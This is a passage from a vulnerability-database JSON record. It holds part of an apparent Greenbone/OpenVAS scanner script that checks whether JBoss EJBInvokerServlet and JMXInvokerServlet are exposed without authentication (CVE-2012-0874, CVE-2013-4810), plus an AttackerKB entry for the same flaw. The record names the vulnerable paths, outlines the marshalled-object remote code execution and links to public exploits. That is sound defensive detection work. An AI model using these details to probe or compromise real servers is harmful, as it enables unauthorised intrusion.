See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103811\");\n script_bugtraq_id(57552, 62854);\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0874\", \"CVE-2013-4810\");\n script_name(\"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-10-15 10:27:36 +0200 (Tue, 15 Oct 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57552\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62854\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/28713/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/30211\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting these issues may allow an attacker to execute\n arbitrary code within the context of the affected application. 
Failed\n exploit attempts may result in a denial-of-service condition.\");\n\n script_tag(name:\"vuldetect\", value:\"Determine if the EJBInvokerServlet and/or JMXInvokerServlet is accessible without authentication.\");\n\n script_tag(name:\"insight\", value:\"The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated\n attacker can post a marshalled object allowing them to install an arbitrary application on the target server.\");\n\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update and enable authentication for the mentioned servlets.\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat/JBoss Application Server providing access to the EJBInvokerServlet and/or JMXInvokerServlet\n without prior authentication.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:9200);\n\nreport = 'The following Servlets are accessible without authentication which indicates that a RCE attack can be executed:\\n';\n\nforeach file(make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\")) {\n\n url = \"/invoker\" + file;\n req = http_get(item:url, port:port);\n buf = http_send_recv(port:port, data:req);\n\n if(buf =~ \"^HTTP/1\\.[01] 200\" &&\n \"404\" >!< buf &&\n \"org.jboss.invocation.MarshalledValue\" >< buf &&\n \"x-java-serialized-object\" >< buf &&\n \"WWW-Authenticate\" >!< buf) {\n\n report += '\\n' + http_report_vuln_url(port:port, url:url, url_only:TRUE);\n VULN = TRUE;\n }\n}\n\nif(VULN) {\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-29T04:59:45", "description": "HP ProCurve 
Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-09-16T00:00:00", "type": "attackerkb", "title": "CVE-2013-4810", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2020-06-05T00:00:00", "id": "AKB:042526B3-4F4D-49D3-A3D1-B483FB66CF4C", "href": "https://attackerkb.com/topics/ku1plIvfwG/cve-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}